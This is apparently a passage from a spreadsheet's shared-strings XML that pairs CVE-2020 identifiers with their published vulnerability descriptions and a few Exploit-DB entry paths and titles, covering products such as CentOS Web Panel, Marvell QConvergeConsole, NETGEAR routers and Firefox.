    <t>An issue was discovered on Samsung mobile devices with Q(10.0) software. Attackers can trigger an out-of-bounds access and device reset via a 4K wallpaper image because ImageProcessHelper mishandles boundary checks. The Samsung ID is SVE-2020-18056 (July 2020).</t>
  </si>
  <si>
    <t>CVE-2020-15586</t>
  </si>
  <si>
    <t>Go before 1.13.13 and 1.14.x before 1.14.5 has a data race in some net/http servers, as demonstrated by the httputil.ReverseProxy Handler, because it reads a request body and writes a response at the same time.</t>
  </si>
  <si>
    <t>CVE-2020-15588</t>
  </si>
  <si>
    <t>An issue was discovered in the client side of Zoho ManageEngine Desktop Central 10.0.552.W. An attacker-controlled server can trigger an integer overflow in InternetSendRequestEx and InternetSendRequestByBitrate that leads to a heap-based buffer overflow and Remote Code Execution with SYSTEM privileges. This issue will occur only when untrusted communication is initiated with server. In cloud, Agent will always connect with trusted communication.</t>
  </si>
  <si>
    <t>CVE-2020-15589</t>
  </si>
  <si>
    <t>A design issue was discovered in GetInternetRequestHandle, InternetSendRequestEx and InternetSendRequestByBitrate in the client side of Zoho ManageEngine Desktop Central 10.0.552.W and Remote Access Plus before 10.1.2119.1. By exploiting this issue, an attacker-controlled server can force the client to skip TLS certificate validation, leading to a man-in-the-middle attack against HTTPS and unauthenticated remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-1559</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Storage Services improperly handle file operations, aka 'Windows Storage Services Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0886.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48626.txt</t>
  </si>
  <si>
    <t>Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting</t>
  </si>
  <si>
    <t>2020-06-30</t>
  </si>
  <si>
    <t>CVE-2020-15590</t>
  </si>
  <si>
    <t>A vulnerability in the Private Internet Access (PIA) VPN Client for Linux 1.5 through 2.3+ allows remote attackers to bypass an intended VPN kill switch mechanism and read sensitive information via intercepting network traffic. Since 1.5, PIA has supported a “split tunnel” OpenVPN bypass option. The PIA killswitch &amp; associated iptables firewall is designed to protect you while using the Internet. When the kill switch is configured to block all inbound and outbound network traffic, privileged applications can continue sending &amp; receiving network traffic if net.ipv4.ip_forward has been enabled in the system kernel parameters. For example, a Docker container running on a host with the VPN turned off, and the kill switch turned on, can continue using the internet, leaking the host IP (CWE 200). In PIA 2.4.0+, policy-based routing is enabled by default and is used to direct all forwarded packets to the VPN interface automatically.</t>
  </si>
  <si>
    <t>CVE-2020-15591</t>
  </si>
  <si>
    <t>fexsrv in F*EX (aka Frams' Fast File EXchange) before fex-20160919_2 allows eval injection (for unauthenticated remote code execution).</t>
  </si>
  <si>
    <t>CVE-2020-15592</t>
  </si>
  <si>
    <t>SteelCentral Aternity Agent before 11.0.0.120 on Windows allows Privilege Escalation via a crafted file. It uses an executable running as a high privileged Windows service to perform administrative tasks and collect data from other processes. It distributes functionality among different processes and uses IPC (Inter-Process Communication) primitives to enable the processes to cooperate. The remotely callable methods from remotable objects available through interprocess communication allow loading of arbitrary plugins (i.e., C# assemblies) from the "%PROGRAMFILES(X86)%/Aternity Information Systems/Assistant/plugins” directory, where the name of the plugin is passed as part of an XML-serialized object. However, because the name of the DLL is concatenated with the “.\plugins” string, a directory traversal vulnerability exists in the way plugins are resolved.</t>
  </si>
  <si>
    <t>CVE-2020-15593</t>
  </si>
  <si>
    <t>SteelCentral Aternity Agent 11.0.0.120 on Windows mishandles IPC. It uses an executable running as a high privileged Windows service to perform administrative tasks and collect data from other processes. It distributes functionality among different processes and uses IPC (Inter-Process Communication) primitives to enable the processes to cooperate. Any user in the system is allowed to access the interprocess communication channel AternityAgentAssistantIpc, retrieve a serialized object and call object methods remotely. Among others, the methods allow any user to: (1) Create and/or overwrite arbitrary XML files across the system; (2) Create arbitrary directories across the system; and (3) Load arbitrary plugins (i.e., C# assemblies) from the "%PROGRAMFILES(X86)/Aternity Information Systems/Assistant/plugins” directory and execute code contained in them.</t>
  </si>
  <si>
    <t>CVE-2020-15594</t>
  </si>
  <si>
    <t>An SSRF issue was discovered in Zoho Application Control Plus before version 10.0.511. The mail gateway configuration feature allows an attacker to perform a scan in order to discover open ports on a machine as well as available machines on the network segment on which the instance of the product is deployed.</t>
  </si>
  <si>
    <t>CVE-2020-15595</t>
  </si>
  <si>
    <t>An issue was discovered in Zoho Application Control Plus before version 10.0.511. The Element Configuration feature (to configure elements included in the scope of elements managed by the product) allows an attacker to retrieve the entire list of the IP ranges and subnets configured in the product and consequently obtain information about the cartography of the internal networks to which the product has access.</t>
  </si>
  <si>
    <t>CVE-2020-15596</t>
  </si>
  <si>
    <t>The ALPS ALPINE touchpad driver before 8.2206.1717.634, as used on various Dell, HP, and Lenovo laptops, allows attackers to conduct Path Disclosure attacks via a "fake" DLL file.</t>
  </si>
  <si>
    <t>CVE-2020-15597</t>
  </si>
  <si>
    <t>SOPlanning 1.46.01 allows persistent XSS via the Project Name, Statutes Comment, Places Comment, or Resources Comment field.</t>
  </si>
  <si>
    <t>CVE-2020-15598</t>
  </si>
  <si>
    <t>** DISPUTED ** Trustwave ModSecurity 3.x through 3.0.4 allows denial of service via a special request. NOTE: The discoverer reports "Trustwave has signaled they are disputing our claims." The CVE suggests that there is a security issue with how ModSecurity handles regular expressions that can result in a Denial of Service condition. The vendor does not consider this as a security issue because1) there is no default configuration issue here. An attacker would need to know that a rule using a potentially problematic regular expression was in place, 2) the attacker would need to know the basic nature of the regular expression itself to exploit any resource issues. It's well known that regular expression usage can be taxing on system resources regardless of the use case. It is up to the administrator to decide on when it is appropriate to trade resources for potential security benefit.</t>
  </si>
  <si>
    <t>CVE-2020-15599</t>
  </si>
  <si>
    <t>Victor CMS through 2019-02-28 allows XSS via the register.php user_firstname or user_lastname field.</t>
  </si>
  <si>
    <t>CVE-2020-1560</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka 'Microsoft Windows Codecs Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1574, CVE-2020-1585.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48679.txt</t>
  </si>
  <si>
    <t>CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)</t>
  </si>
  <si>
    <t>2020-07-17</t>
  </si>
  <si>
    <t>CVE-2020-15600</t>
  </si>
  <si>
    <t>An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.</t>
  </si>
  <si>
    <t>CVE-2020-15601</t>
  </si>
  <si>
    <t>If LDAP authentication is enabled, an LDAP authentication bypass vulnerability in Trend Micro Deep Security 10.x-12.x could allow an unauthenticated attacker with prior knowledge of the targeted organization to bypass manager authentication. Enabling multi-factor authentication prevents this attack. Installations using manager native authentication or SAML authentication are not impacted by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-15602</t>
  </si>
  <si>
    <t>An untrusted search path remote code execution (RCE) vulnerability in the Trend Micro Secuity 2020 (v16.0.0.1146 and below) consumer family of products could allow an attacker to run arbitrary code on a vulnerable system. As the Trend Micro installer tries to load DLL files from its current directory, an arbitrary DLL could also be loaded with the same privileges as the installer if run as Administrator. User interaction is required to exploit the vulnerbaility in that the target must open a malicious directory or device.</t>
  </si>
  <si>
    <t>CVE-2020-15603</t>
  </si>
  <si>
    <t>An invalid memory read vulnerability in a Trend Micro Secuity 2020 (v16.0.0.1302 and below) consumer family of products' driver could allow an attacker to manipulate the specific driver to do a system call operation with an invalid address, resulting in a potential system crash.</t>
  </si>
  <si>
    <t>CVE-2020-15604</t>
  </si>
  <si>
    <t>An incomplete SSL server certification validation vulnerability in the Trend Micro Security 2019 (v15) consumer family of products could allow an attacker to combine this vulnerability with another attack to trick an affected client into downloading a malicious update instead of the expected one. CWE-494: Update files are not properly verified.</t>
  </si>
  <si>
    <t>CVE-2020-15605</t>
  </si>
  <si>
    <t>If LDAP authentication is enabled, an LDAP authentication bypass vulnerability in Trend Micro Vulnerability Protection 2.0 SP2 could allow an unauthenticated attacker with prior knowledge of the targeted organization to bypass manager authentication. Enabling multi-factor authentication prevents this attack. Installations using manager native authentication or SAML authentication are not impacted by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-15606</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_admin_apis.php. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9720.</t>
  </si>
  <si>
    <t>CVE-2020-15607</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_admin_apis.php. When parsing the line parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9721.</t>
  </si>
  <si>
    <t>CVE-2020-15608</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_dashboard.php. When parsing the ai_service parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9724.</t>
  </si>
  <si>
    <t>CVE-2020-15609</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_dashboard.php. When parsing the service_stop parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9726.</t>
  </si>
  <si>
    <t>CVE-2020-1561</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka 'Microsoft Graphics Components Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1562.</t>
  </si>
  <si>
    <t>CVE-2020-15610</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_php_pecl.php. When parsing the modulo parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9728.</t>
  </si>
  <si>
    <t>CVE-2020-15611</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_dashboard.php. When parsing the service_restart parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9734.</t>
  </si>
  <si>
    <t>CVE-2020-15612</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_ftp_manager.php. When parsing the userLogin parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9737.</t>
  </si>
  <si>
    <t>CVE-2020-15613</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_admin_apis.php. When parsing the line parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9739.</t>
  </si>
  <si>
    <t>CVE-2020-15614</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_php_pecl.php. When parsing the cha parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9718.</t>
  </si>
  <si>
    <t>CVE-2020-15615</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_ftp_manager.php. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9746.</t>
  </si>
  <si>
    <t>CVE-2020-15616</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_list_accounts.php. When parsing the package parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9706.</t>
  </si>
  <si>
    <t>CVE-2020-15617</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_list_accounts.php. When parsing the status parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9708.</t>
  </si>
  <si>
    <t>CVE-2020-15618</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_list_accounts.php. When parsing the username parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9717.</t>
  </si>
  <si>
    <t>CVE-2020-15619</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_list_accounts.php. When parsing the type parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9723.</t>
  </si>
  <si>
    <t>CVE-2020-1562</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka 'Microsoft Graphics Components Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1561.</t>
  </si>
  <si>
    <t>CVE-2020-15620</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_list_accounts.php. When parsing the id parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9741.</t>
  </si>
  <si>
    <t>CVE-2020-15621</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mail_autoreply.php. When parsing the email parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9711.</t>
  </si>
  <si>
    <t>CVE-2020-15622</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mail_autoreply.php. When parsing the search parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9712.</t>
  </si>
  <si>
    <t>CVE-2020-15623</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to write arbitrary files on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. When parsing the archivo parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9722.</t>
  </si>
  <si>
    <t>CVE-2020-15624</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_new_account.php. When parsing the domain parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9727.</t>
  </si>
  <si>
    <t>CVE-2020-15625</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_add_mailbox.php. When parsing the username parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9729.</t>
  </si>
  <si>
    <t>CVE-2020-15626</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_dashboard.php. When parsing the term parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9730.</t>
  </si>
  <si>
    <t>CVE-2020-15627</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mail_autoreply.php. When parsing the account parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9738.</t>
  </si>
  <si>
    <t>CVE-2020-15628</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mail_autoreply.php. When parsing the user parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9710.</t>
  </si>
  <si>
    <t>CVE-2020-15629</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handling of TIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10764.</t>
  </si>
  <si>
    <t>CVE-2020-1563</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka 'Microsoft Office Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15630</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of PNG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10977.</t>
  </si>
  <si>
    <t>CVE-2020-15631</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1860 1.04B03_HOTFIX WiFi extenders. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the HNAP service, which listens on TCP port 80 by default. When parsing the SOAPAction header, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-10084.</t>
  </si>
  <si>
    <t>CVE-2020-15632</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-842 3.13B05 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of HNAP GetCAPTCHAsetting requests. The issue results from the lack of proper handling of sessions. An attacker can leverage this vulnerability to execute arbitrary code in the context of the device. Was ZDI-CAN-10083.</t>
  </si>
  <si>
    <t>303</t>
  </si>
  <si>
    <t>CVE-2020-15633</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-867, DIR-878, and DIR-882 routers with firmware 1.20B10_BETA. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of HNAP requests. The issue results from incorrect string matching logic when accessing protected pages. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the router. Was ZDI-CAN-10835.</t>
  </si>
  <si>
    <t>CVE-2020-15634</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700 routers with firmware 1.0.4.84_10.0.58. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of string table file uploads. The issue results from the lack of proper validation of a user-supplied string before using it as a format specifier. An attacker can leverage this vulnerability to execute code in the context of the web server. Was ZDI-CAN-9755.</t>
  </si>
  <si>
    <t>CVE-2020-15635</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers with firmware 1.0.4.84_10.0.58. Authentication is not required to exploit this vulnerability. The specific flaw exists within the acsd service, which listens on TCP port 5916 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-9853.</t>
  </si>
  <si>
    <t>CVE-2020-15636</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR R6400, R6700, R7000, R7850, R7900, R8000, RS400, and XR300 routers with firmware 1.0.4.84_10.0.58. Authentication is not required to exploit this vulnerability. The specific flaw exists within the check_ra service. A crafted raePolicyVersion in a RAE_Policy.json file can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9852.</t>
  </si>
  <si>
    <t>CVE-2020-15637</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PhantomPDF 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the SetLocalDescription method. By performing actions in JavaScript, an attacker can cause a pointer to be reused after it has been freed. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-10972.</t>
  </si>
  <si>
    <t>CVE-2020-15638</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.2.29539. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the NodeProperties::InferReceiverMapsUnsafe method. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10950.</t>
  </si>
  <si>
    <t>CVE-2020-15639</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Marvell QConvergeConsole 5.5.0.64. Authentication is not required to exploit this vulnerability. The specific flaw exists within the decryptFile method of the FlashValidatorServiceImpl class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-10496.</t>
  </si>
  <si>
    <t>CVE-2020-1564</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1473, CVE-2020-1557, CVE-2020-1558.</t>
  </si>
  <si>
    <t>CVE-2020-15640</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Marvell QConvergeConsole 5.5.0.64. Authentication is not required to exploit this vulnerability. The specific flaw exists within the getFileUploadBytes method of the FlashValidatorServiceImpl class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-10497.</t>
  </si>
  <si>
    <t>CVE-2020-15641</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Marvell QConvergeConsole 5.5.0.64. Authentication is not required to exploit this vulnerability. The specific flaw exists within the getFileUploadBytes method of the FlashValidatorServiceImpl class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-10499.</t>
  </si>
  <si>
    <t>CVE-2020-15642</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of installations of Marvell QConvergeConsole 5.5.0.64. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the isHPSmartComponent method of the GWTTestServiceImpl class. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-10501.</t>
  </si>
  <si>
    <t>CVE-2020-15643</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Marvell QConvergeConsole 5.5.0.64. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the saveAsText method of the GWTTestServiceImpl class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-10549.</t>
  </si>
  <si>
    <t>CVE-2020-15644</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Marvell QConvergeConsole 5.5.0.64. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the setAppFileBytes method of the GWTTestServiceImpl class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-10550.</t>
  </si>
  <si>
    <t>CVE-2020-15645</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Marvell QConvergeConsole 5.5.0.64. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the getFileFromURL method of the GWTTestServiceImpl class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-10553.</t>
  </si>
  <si>
    <t>CVE-2020-15646</t>
  </si>
  <si>
    <t>If an attacker intercepts Thunderbird's initial attempt to perform automatic account setup using the Microsoft Exchange autodiscovery mechanism, and the attacker sends a crafted response, then Thunderbird sends username and password over https to a server controlled by the attacker. This vulnerability affects Thunderbird &lt; 68.10.0.</t>
  </si>
  <si>
    <t>CVE-2020-15647</t>
  </si>
  <si>
    <t>A Content Provider in Firefox for Android allowed local files accessible by the browser to be read by a remote webpage, leading to sensitive data disclosure, including cookies for other origins. This vulnerability affects Firefox for &lt; Android.</t>
  </si>
  <si>
    <t>CVE-2020-15648</t>
  </si>
  <si>
    <t>Using object or embed tags, it was possible to frame other websites, even if they disallowed framing using the X-Frame-Options header. This vulnerability affects Thunderbird &lt; 78 and Firefox &lt; 78.0.2.</t>
  </si>
  <si>
    <t>CVE-2020-15649</t>
  </si>
  <si>
    <t>Given an installed malicious file picker application, an attacker was able to steal and upload local files of their choosing, regardless of the actually files picked. *Note: This issue only affected Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox ESR &lt; 68.11.</t>
  </si>
  <si>
    <t>CVE-2020-1565</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the &amp;quot;Public Account Pictures&amp;quot; folder improperly handles junctions.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15650</t>
  </si>
  <si>
    <t>Given an installed malicious file picker application, an attacker was able to overwrite local files and thus overwrite Firefox settings (but not access the previous profile). *Note: This issue only affected Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox ESR &lt; 68.11.</t>
  </si>
  <si>
    <t>CVE-2020-15651</t>
  </si>
  <si>
    <t>A unicode RTL order character in the downloaded file name can be used to change the file's name during the download UI flow to change the file extension. This vulnerability affects Firefox for iOS &lt; 28.</t>
  </si>
  <si>
    <t>CVE-2020-15652</t>
  </si>
  <si>
    <t>By observing the stack trace for JavaScript errors in web workers, it was possible to leak the result of a cross-origin redirect. This applied only to content that can be parsed as script. This vulnerability affects Firefox &lt; 79, Firefox ESR &lt; 68.11, Firefox ESR &lt; 78.1, Thunderbird &lt; 68.11, and Thunderbird &lt; 78.1.</t>
  </si>
  <si>
    <t>CVE-2020-15653</t>
  </si>
  <si>
    <t>An iframe sandbox element with the allow-popups flag could be bypassed when using noopener links. This could have led to security issues for websites relying on sandbox configurations that allowed popups and hosted arbitrary content. This vulnerability affects Firefox ESR &lt; 78.1, Firefox &lt; 79, and Thunderbird &lt; 78.1.</t>
  </si>
  <si>
    <t>CVE-2020-15654</t>
  </si>
  <si>
    <t>When in an endless loop, a website specifying a custom cursor using CSS could make it look like the user is interacting with the user interface, when they are not. This could lead to a perceived broken state, especially when interactions with existing browser dialogs and warnings do not work. This vulnerability affects Firefox ESR &lt; 78.1, Firefox &lt; 79, and Thunderbird &lt; 78.1.</t>
  </si>
  <si>
    <t>CVE-2020-15655</t>
  </si>
  <si>
    <t>A redirected HTTP request which is observed or modified through a web extension could bypass existing CORS checks, leading to potential disclosure of cross-origin information. This vulnerability affects Firefox ESR &lt; 78.1, Firefox &lt; 79, and Thunderbird &lt; 78.1.</t>
  </si>
  <si>
    <t>CVE-2020-15656</t>
  </si>
  <si>
